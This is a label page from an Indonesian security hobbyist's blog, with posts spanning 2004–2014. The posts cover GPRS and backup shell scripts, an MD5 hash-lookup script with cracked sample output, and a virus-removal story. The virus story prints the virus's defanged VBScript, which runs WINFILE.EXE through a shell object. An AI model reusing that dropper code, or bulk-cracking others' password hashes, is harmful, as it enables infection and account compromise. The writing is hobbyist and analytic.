Gw memiliki sebuah wd-booklive (berbasis debian) yang terletak di suatu tempat yang dirahasiakan :) dan gw jadikan server torrent mempergunakan transmission dengan web-ui dan biasanya gw akses (via port-forward di router) via dyndns domain name (*.dyndns.com) dikarenakan ip yang didapatkan dari provider dynamic.
Sebagai salah satu pengguna tetap dyndns versi gratis, dan dikarenakan router yang gw pergunakan mendukung (via web management) dyndns untuk dynamic dns gw merasakan kesulitan karena sejak negara api menyerang (:P) maka layanan ini sudah ditiadakan oleh dyndns :(.
Dari dulu, gw pengen sekali ngebuatin script untuk kirim info ip saat mesin gw booting, dan baru bisa di wujudkan hari ini. Lewat googling, gw menemukan sebuah link di web ini http://elinux.org/RPi_Email_IP_On_Boot_Debian yang berisi bagaimana membuat mesin raspberry melaporkan ip-nya via email. Terdapat beberapa perbedaan, sampai akhirnya gw melakukan beberapa modifikasi sebagai berikut:
y3dips shares stories about life, family, hacking, computer security, and *nix.
Showing posts with label scrapt. Show all posts
Showing posts with label scrapt. Show all posts
Friday, May 30, 2014
Monday, June 17, 2013
IDSECCONF 2013 ctf offline: exploitation challenge (500) exploit
And for all the team that played yesterday, you can use this skeleton (only with calc payload) exploit to wrap up your remote-code-execution exploit and get the flag.txt file at Desktop directory (inside the Windows VM you are copying).
Thursday, April 14, 2011
hashkiller.py - md5 leecher for hashkiller.com
Script ini sudah cukup lawas gw pergunakan :P, jadi sebelum gw lupa mending gw share, dan gw rasa mungkin dah ada yang pernah buat juga, baik tuk situs yang sama or beda
Script ini berguna untuk membantu menemukan plain text dari md5 dengan cara mensubmit hash dari file ke situs hashkiller.com yang di ketahui memiliki layanan untuk melakukan penemuan plain dari md5, serta proses '(not really)cracking' massal.
kelebihannya adalah,
1. kita tidak perlu melakukan secara manual (khususnya yang miskin resource), dan hanya men-search dari database,
2. serta entry yang tidak ditemukan akan di-add ke database, dan akan tetap di dicarikan "plain md5"-nya, sehingga anda cukup me-"re-run" ulang skrip ini.
Kelemahannya adalah,
1. anda butuh kecepatan internet yang relatif stabil,
2. mensubmit dalam jumlah besar akan bermasalah, saya pernah mencoba untuk 30k password walau hasilnya tidak terlalu mengecewakan (hampir 80% ditemukan dalam waktu relatif cepat) tetapi sebaiknya di split, misal 1k dalam 1 buah file :D
Well, intinya skrip ini hanya meng-automatisasi proses submit manual ke hashkiller.com
Enjoy!!!
------ hashkiller.py.txt -----
Cek script di http://y3dips.echo.or.id/scrapt/hashkiller.py.txt
-------------------- In Action
DareDevil:Desktop ammar$ ./hashkiller.py hash.txt
5ebe2294ecd0e0f08eab7690d2a6ee69 : secret
f94ff0b6e0c902639f5c6b15f1fdd4c4 : Not Found Yet - (re-run later)
955591d032c32b38f1996bb73176ec92 : Not Found Yet - (re-run later)
ab7ce6b83cc906224209e801fd8d23ad : Not Found Yet - (re-run later)
e10adc3949ba59abbe56e057f20f883e : 123456
a4fd8e6fa9fbf9a6f2c99e7b70aa9ef2 : Not Found Yet - (re-run later)
583fea53729bcb119bc1099a0dc5e73d : Not Found Yet - (re-run later)
DareDevil:Desktop ammar$ ./hashkiller.py hash.txt
5ebe2294ecd0e0f08eab7690d2a6ee69 : secret
f94ff0b6e0c902639f5c6b15f1fdd4c4 : n1rv4n4
955591d032c32b38f1996bb73176ec92 : Not Found Yet - (re-run later)
ab7ce6b83cc906224209e801fd8d23ad : superl33t
e10adc3949ba59abbe56e057f20f883e : 123456
a4fd8e6fa9fbf9a6f2c99e7b70aa9ef2 : p455w0rd
583fea53729bcb119bc1099a0dc5e73d : Not Found Yet - (re-run later)
Script ini berguna untuk membantu menemukan plain text dari md5 dengan cara mensubmit hash dari file ke situs hashkiller.com yang di ketahui memiliki layanan untuk melakukan penemuan plain dari md5, serta proses '(not really)cracking' massal.
kelebihannya adalah,
1. kita tidak perlu melakukan secara manual (khususnya yang miskin resource), dan hanya men-search dari database,
2. serta entry yang tidak ditemukan akan di-add ke database, dan akan tetap di dicarikan "plain md5"-nya, sehingga anda cukup me-"re-run" ulang skrip ini.
Kelemahannya adalah,
1. anda butuh kecepatan internet yang relatif stabil,
2. mensubmit dalam jumlah besar akan bermasalah, saya pernah mencoba untuk 30k password walau hasilnya tidak terlalu mengecewakan (hampir 80% ditemukan dalam waktu relatif cepat) tetapi sebaiknya di split, misal 1k dalam 1 buah file :D
Well, intinya skrip ini hanya meng-automatisasi proses submit manual ke hashkiller.com
Enjoy!!!
------ hashkiller.py.txt -----
Cek script di http://y3dips.echo.or.id/scrapt/hashkiller.py.txt
-------------------- In Action
DareDevil:Desktop ammar$ ./hashkiller.py hash.txt
5ebe2294ecd0e0f08eab7690d2a6ee69 : secret
f94ff0b6e0c902639f5c6b15f1fdd4c4 : Not Found Yet - (re-run later)
955591d032c32b38f1996bb73176ec92 : Not Found Yet - (re-run later)
ab7ce6b83cc906224209e801fd8d23ad : Not Found Yet - (re-run later)
e10adc3949ba59abbe56e057f20f883e : 123456
a4fd8e6fa9fbf9a6f2c99e7b70aa9ef2 : Not Found Yet - (re-run later)
583fea53729bcb119bc1099a0dc5e73d : Not Found Yet - (re-run later)
DareDevil:Desktop ammar$ ./hashkiller.py hash.txt
5ebe2294ecd0e0f08eab7690d2a6ee69 : secret
f94ff0b6e0c902639f5c6b15f1fdd4c4 : n1rv4n4
955591d032c32b38f1996bb73176ec92 : Not Found Yet - (re-run later)
ab7ce6b83cc906224209e801fd8d23ad : superl33t
e10adc3949ba59abbe56e057f20f883e : 123456
a4fd8e6fa9fbf9a6f2c99e7b70aa9ef2 : p455w0rd
583fea53729bcb119bc1099a0dc5e73d : Not Found Yet - (re-run later)
Tuesday, May 20, 2008
e-rdc jalur SSL

Untuk meningkatkan privasi dan meminimalisasi celah keamanan di jalur pengiriman khususnya bagi para pemilik login (tetaplah waspada terhadap serangan ARP spoofing yang di kombinasikan dengan sertifikat SSL palsu ) :), maka barusan ini saya buatkan jalur SSL untuk situs e-rdc.org. Prosesnya sedikit rumit karena saya terpaksa harus membuatkan skrip serta mengkonfigurasikan kembali fitur "enkripsi" untuk mengamankan file konfigurasi.
Baiklah, Untuk Para Rangers dan Strangers semuanya, Selamat menikmati .. Go..Go!
images are property of http://www.wingimp.org
Tuesday, March 11, 2008
Backup ..
This is an old (8th years already) sh script for backup your linux machine, Using TAR for doing a full backup and daily incremental backup, yup still the best for me :)
Combining it with crontab and see how powerfull it is :)
enjoy(tm)
#!/bin/sh
# full and incremental backup script
# created 07 February 2000
# Based on a script by Daniel O'Callaghan
# and modified by Gerhard Mourani
#Change the 5 variables below to fit your computer/backup
COMPUTER=venom # name of this computer
DIRECTORIES="/home/ammar/" # directoris to backup
BACKUPDIR=/media/backup # where to store the backups
TIMEDIR=/media/backup/last-full # where to store time of full backup
TAR=/bin/tar # name and locaction of tar
PATH=/usr/local/bin:/usr/bin:/bin
DOW=`date +%a` # Day of the week e.g. Mon
DOM=`date +%d` # Date of the Month e.g. 27
DM=`date +%d%b` # Date and Month e.g. 27Sep
if [ $DOM = "01" ]; then
NEWER=""
$TAR $NEWER -cfz $BACKUPDIR/$COMPUTER-$DM.tar.gz $DIRECTORIES
fi
if [ $DOW = "Sun" ]; then
NEWER=""
NOW=`date +%d-%b`
# Update full backup date
echo $NOW > $TIMEDIR/$COMPUTER-full-date
$TAR $NEWER -cfz $BACKUPDIR/$COMPUTER-$DOW.tar.gz $DIRECTORIES
else
# Get date of last full backup
NEWER="--newer `cat $TIMEDIR/$COMPUTER-full-date`"
$TAR $NEWER -cfz $BACKUPDIR/$COMPUTER-$DOW.tar.gz $DIRECTORIES
fi
Combining it with crontab and see how powerfull it is :)
enjoy(tm)
Monday, October 17, 2005
WINFILE ?
Dah lama gak main main winblows, eh pas pake winblows buat cobain tuk bahan bicara di BINUS besok terpaksa pake winblows yang dah lama gak dipake (dual ma ubuntu di junk server) , kebetulan aku pake SP2 .. hehehe
nah, kebetulan sekalian ngopiin file "ngaji" ke IPOD via iTunes supaya bisa di dengerin , eh tiba tiba di ipod ada file WINFILE (maklum abis dipake ma adek n baru balik tadi , n ternyata nyisain sedikit oleh oleh :p ) , hehehe, iseng iseng tak eksekusi eh kok gak bereaksi , karena mencurigakan maka tak DELETE aja hehehehe, SHIFT + DEL (biar gak masuk recycle) , yups aman.. eh... wuih filenya tiba tiba muncul lagi :) (ajaib :P) , wuih ... karena males ngeberesinnya , aku pikir nanti deh di ubuntu tak hapus :P (pengen tau secanggih apa sih nih virus kalo gak nemu registry di OS, di linux mana ada registry ..lol.. :P)
Ya udah , install APPSERV (untuk latihan simulasi via webhacking) , tapi tiba tiba pas browse direktori C:\ , eh WINFILE dah muncul disitu dan nongkrong dengan pongahnya (sialan!!) , ya udah deh aku langsung pencet Ctrl+Alt+DEl (walau bego bego gini aku tau dimana biasanya program ini bercokol) , eh ada image name Wuur (yah walau dah lama gak pake windows tapi alhamdulillah masih inget mana service dengan image name aseli dan fake :P , dan juga dulu kebetulan pernah belajar "virus-virus-an" dikit ..heheh...) langsung aja aku kill/matiin (ternyata gak terlalu canggih nih virus) , abis itu tak search semua file WINFILE , n aku delete aja, yup 1 lagi harus cari tau pemicunya (pembangkitnya), biasanya sih di autoexec, startup, or cara termudah ketik di run -- > msconfig (hum, bisa masup, ternyata virusnya cuma buat iseng nih, gak ada canggih canggihnya, gantian /me songong dikit ... :p ), masuk bagian stratup eh nemuin lagi Startup Item WUUR yang mengeksekusi command ke "C:\WINDOWS\TEMP\WUUR.exe", ya udah tinggal drivethrough ke dir WINDOWS\TEMP dan aku delete langsung deh "WUUR.exe", langsung rebes degh (ternyata gw gak goblog goblog banget yah :P ).... sayang gak sempet Reverse engineering file wuurnya abis gw gak mau lama lama di winblows :p
btw dia juga buat dua file lain yang pertama "comment.htt" yang merupakan VBS berisikan
dan desktop.ini
2 file di kacaukan biar kalo buka blog gw gak di blok antivirus :p , sekalian delete aja kedua file itu :)
btw , gw gak pake ANtivirus tuh :P !!!!!!
nah, kebetulan sekalian ngopiin file "ngaji" ke IPOD via iTunes supaya bisa di dengerin , eh tiba tiba di ipod ada file WINFILE (maklum abis dipake ma adek n baru balik tadi , n ternyata nyisain sedikit oleh oleh :p ) , hehehe, iseng iseng tak eksekusi eh kok gak bereaksi , karena mencurigakan maka tak DELETE aja hehehehe, SHIFT + DEL (biar gak masuk recycle) , yups aman.. eh... wuih filenya tiba tiba muncul lagi :) (ajaib :P) , wuih ... karena males ngeberesinnya , aku pikir nanti deh di ubuntu tak hapus :P (pengen tau secanggih apa sih nih virus kalo gak nemu registry di OS, di linux mana ada registry ..lol.. :P)
Ya udah , install APPSERV (untuk latihan simulasi via webhacking) , tapi tiba tiba pas browse direktori C:\ , eh WINFILE dah muncul disitu dan nongkrong dengan pongahnya (sialan!!) , ya udah deh aku langsung pencet Ctrl+Alt+DEl (walau bego bego gini aku tau dimana biasanya program ini bercokol) , eh ada image name Wuur (yah walau dah lama gak pake windows tapi alhamdulillah masih inget mana service dengan image name aseli dan fake :P , dan juga dulu kebetulan pernah belajar "virus-virus-an" dikit ..heheh...) langsung aja aku kill/matiin (ternyata gak terlalu canggih nih virus) , abis itu tak search semua file WINFILE , n aku delete aja, yup 1 lagi harus cari tau pemicunya (pembangkitnya), biasanya sih di autoexec, startup, or cara termudah ketik di run -- > msconfig (hum, bisa masup, ternyata virusnya cuma buat iseng nih, gak ada canggih canggihnya, gantian /me songong dikit ... :p ), masuk bagian stratup eh nemuin lagi Startup Item WUUR yang mengeksekusi command ke "C:\WINDOWS\TEMP\WUUR.exe", ya udah tinggal drivethrough ke dir WINDOWS\TEMP dan aku delete langsung deh "WUUR.exe", langsung rebes degh (ternyata gw gak goblog goblog banget yah :P ).... sayang gak sempet Reverse engineering file wuurnya abis gw gak mau lama lama di winblows :p
btw dia juga buat dua file lain yang pertama "comment.htt" yang merupakan VBS berisikan
<#ody><#tml>
<#ody >
<#cript language=vbscript>
document.write ""
#cript>
<#cript language=vbscript>
On Error Resume Next
Dim we,path,win
we = ""
Path = ""
win=""
Path = Left(document.location, Len(document.location) - 11)
Path = Mid(Path, 9)
Set Ap#leObject = document.ap#lets("lhw")
Ap#leObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
Ap#leObject.createInstance()
Set Ws#hell = Ap#leObject.GetObject()
Ws#hell.run(Path + "WINFILE.EXE")
<#script>
<#body>
<#html>
<#body>
dan desktop.ini
[.Sh#llCl#ssInfo]
HTMLInfoTipFile=file://C#mment.htt
Conf#rmFileOp = 0
2 file di kacaukan biar kalo buka blog gw gak di blok antivirus :p , sekalian delete aja kedua file itu :)
btw , gw gak pake ANtivirus tuh :P !!!!!!
Friday, August 19, 2005
.bashrc
y3dips@heaven:~$ vi .bashrcold trick but phun enough ,just simplify your command !
---cutted---
alias ll='ls -l'
alias la='ls -a'
alias un='uname -a'
---cutted-----
y3dips@heaven:~$ bash
y3dips@heaven:~$ un
Linux heaven 2.6.10-5-386 #1 Fri Jun 24 16:53:01 UTC 2005 i686 GNU/Linux
y3dips@heaven:~$ la
addres .gksu .lock NETCFSetup.msi .sversionrc
.adobe .gnome _temp exploits .gnome2 .ntrc_2 .themes
Wednesday, July 13, 2005
57 second with me at 00.35
SIAP bozz!!, hehehe belum bisa tidur euy jadinya nulis blog, baru aja kelar bikin paper buat seminar echo n "alhamdulillah" dah 90 % menuju selesai, tinggal edit edit dikit dan tambal sana sini .
Soal seminar temanya sih gak jauh jauh dari "next level"-nya itu sendiri, ibni merupakan next level (lanjutan) dari materi materi sebelumnya yang pernah aku tulis dan aku presentasikan, bukan artinya next level itu adalah "31337. Yang jelas sambil buat paper , nambah nambah ilmu lagi buat aku :)
Barusan juga aku sempurnain script shell-nya GPRS aku, kebetulan baru nemu cara baru , jadinya lebih pendek dibanding versi sebelumnya, maaf nih karena "amatiran" jadoi scriptnya di revisi terus sembari belajar :) , here are the code gprs_0_3.sh.txt :
Oh yah, Hari ini aku juga ngeliatin foto salah satu "Temen cewe muluw, hehehe abis lucu sih (remind me about someone) , kok bisa mirip banget yah, perwujudan fisik dan sifatnya (aku belum kenal deket sih, gak tau deh bisa kenal deket apa enggak).
Tadi siang nonton "interpreter"-nya NICOLE KIDMAN (bener gak yah) sama sean penn, lumayan asyik walau awal awalnya alurnya lambat banget tetapi cukup menghibur buat di tonton, n juga tadi minjem slamdunk seri 1-5 yang rencananya mo dibaca semua malam ini n dibalikin besok, tetapi karena tadi semaleman ujicoba untuk buat paper seminar maka waktu tersita so baru kelar 1 buku setengah (rekor nih, sebelumnya gak pernah aku nyia nyiain komik loh :P)
Tadi siang Gara gara liat trealernya "UNGU VIOLET" di laptop ,aku jadi pengen "nonton" lagi euy , hiks hiks. Masih di puter gak yah ? mudah mudahan Sabtu masih main :D
Soal seminar temanya sih gak jauh jauh dari "next level"-nya itu sendiri, ibni merupakan next level (lanjutan) dari materi materi sebelumnya yang pernah aku tulis dan aku presentasikan, bukan artinya next level itu adalah "31337. Yang jelas sambil buat paper , nambah nambah ilmu lagi buat aku :)
Barusan juga aku sempurnain script shell-nya GPRS aku, kebetulan baru nemu cara baru , jadinya lebih pendek dibanding versi sebelumnya, maaf nih karena "amatiran" jadoi scriptnya di revisi terus sembari belajar :) , here are the code gprs_0_3.sh.txt :
#!/bin/sh
# gprs - manage your gprs connection
#
# $Id: gprs v 0.3 2005/13/05 00:11:14 y3dips Exp $
# turn on your device to discoverable , then do ./gprs scan then ./gprs start
#Deklarasi :p
RFCOMM=/usr/bin/rfcomm
HCITOOL=/usr/bin/hcitool
X=0
FILE=log
ADDRESS=addres
LOCKFILE=/var/lock/LCK..rfcomm0
test -f $RFCOMM || exit 0
test -f $HCITOOL || exit 0
case "$1" in
scan)
echo -n "Mendeteksi Peralatan"
lsusb > _temp
if [ ! "`grep ^BLuetooth _temp`" ] ; then
$HCITOOL scan > $ADDRESS &
sleep 10
echo " "
else
echo -n "Peralatan Bluetooth anda tidak terdeteksi"
fi
;;
start)
echo -n "Menyalakan GPRS "
if [ -f "$LOCKFILE" ] ; then
echo " ..... pppd sudah running "
else
$RFCOMM show > $FILE
if [ "`grep ^rfcomm0: $FILE`" ] ; then
pppd call gprs &
else
echo " "
tail -n 1 $ADDRESS > _temp
cut -f 2 _temp > $ADDRESS
DEVICE=`cat $ADDRESS`
$RFCOMM bind $X $DEVICE 1
pppd call gprs &
fi
fi
;;
stop)
echo -n "Matikan GPRS "
pid=`cat $LOCKFILE`
kill -9 $pid
#release the device
$RFCOMM release $X
#Delete all temporary file
rm -f $FILE $LOCKFILE _temp
sleep 5
echo "..... tewas"
echo -n
;;
restart)
$0 stop
$0 start
;;
*)
echo " Gunakan : $0 { scan | start | stop | restart }"
exit 1
esac
exit 0
#y3dips(c)2005
Oh yah, Hari ini aku juga ngeliatin foto salah satu "Temen cewe muluw, hehehe abis lucu sih (remind me about someone) , kok bisa mirip banget yah, perwujudan fisik dan sifatnya (aku belum kenal deket sih, gak tau deh bisa kenal deket apa enggak).
Tadi siang nonton "interpreter"-nya NICOLE KIDMAN (bener gak yah) sama sean penn, lumayan asyik walau awal awalnya alurnya lambat banget tetapi cukup menghibur buat di tonton, n juga tadi minjem slamdunk seri 1-5 yang rencananya mo dibaca semua malam ini n dibalikin besok, tetapi karena tadi semaleman ujicoba untuk buat paper seminar maka waktu tersita so baru kelar 1 buku setengah (rekor nih, sebelumnya gak pernah aku nyia nyiain komik loh :P)
Tadi siang Gara gara liat trealernya "UNGU VIOLET" di laptop ,aku jadi pengen "nonton" lagi euy , hiks hiks. Masih di puter gak yah ? mudah mudahan Sabtu masih main :D
Friday, July 08, 2005
gprs shell script version 0.2
Yesterday , ive already finished a new version of my gprs shell script. I put "scan" options to the script so you just need to turn on your "device" n it will detect the "device" addresses , i also do some re-write to some command. But , i think it still far from "perfect" , and i will make it more n more stable (hope so), you can check it at http://www.geocities.com/y3d1ps/scrapt/gprs_0_2.sh.txt , if u have a time please check it for me , would yo ? :)
Sunday, July 03, 2005
Gprs shell script
#!/bin/sh
# manage your gprs connection
#
# $Id: gprs v 0.1 2005/07/02 15:52:14 y3dips Exp $
# turn on your device to discoverable , then do ./gp scan then ./gp start
RFCOMM=/usr/bin/rfcomm
HCITOOL=/usr/bin/hcitool
X=0 #alamat bind tuk device
FILE=log
PSFILE=ps
PIDFILE=gprs.pid
ADDRESS=addres
test -f $RFCOMM || exit 0
test -f $HCITOOL || exit 0
case "$1" in
scan)
echo -n "Mendeteksi Peralatan"
$HCITOOL scan > $ADDRESS &
sleep 10
echo " "
;;
start)
echo -n "Menyalakan GPRS "
ps awx | grep "pppd call gprs" > $PSFILE
if [ "`grep ^"pppd call gprs" $PSFILE`"] ; then
echo "..... pppd sudah di jalankan" && exit 0
echo -n
else
echo -n
$RFCOMM show > $FILE
if [ "`grep ^rfcomm0: $FILE`" ] ; then
pppd call gprs &
else
tail -n 1 $ADDRESS > 2
cut -f 2 2 > $ADDRESS
DEVICE=`cat $ADDRESS`
$RFCOMM bind $X $DEVICE 1
pppd call gprs &
fi
fi
;;
stop)
echo -n "Matikan GPRS "
ps awx | grep -e "pppd call gprs" > $PSFILE
head -n 1 $PSFILE > 3
cut -f 1 -d ' ' 3 > $PIDFILE
pid=`cat $PIDFILE`
kill -9 $pid
$RFCOMM release $X
rm -rf $FILE
rm -rf $PSFILE
sleep 5
echo "..... tewas"
echo -n
;;
restart)
$0 stop
$0 start
;;
*)
echo " Gunakan : $0 { scan | start | stop | restart }"
exit 1
esac
exit 0
#y3dips(c)2005
Monday, October 18, 2004
PERL its ROCK !!!!!
huehueh, akhirnya sploits terbaru gwa bakal gwa rilis di ezine #8 , mungkin gak bakalan banyak dapet target dengan sploits itu, karena advisoriesnya dah lama gwa rilis dan kebanyakan dah di patch semua :(( . tetapi itukan cuma buat belajar, so gak ada salahnya :)
sploits ini cuma pake ARGV buat ambil inputan sama LWP .pokoknya asik banget dech.. perl its ROCK!! , gwa mo blajar nulis real sploits nih , mo pake format string apa buffer overflow yach , hum yang jelas belajar dulu...kekekeke .. doakan aku berjuang yach teman teman!!
sploits ini cuma pake ARGV buat ambil inputan sama LWP .pokoknya asik banget dech.. perl its ROCK!! , gwa mo blajar nulis real sploits nih , mo pake format string apa buffer overflow yach , hum yang jelas belajar dulu...kekekeke .. doakan aku berjuang yach teman teman!!
Subscribe to:
Posts (Atom)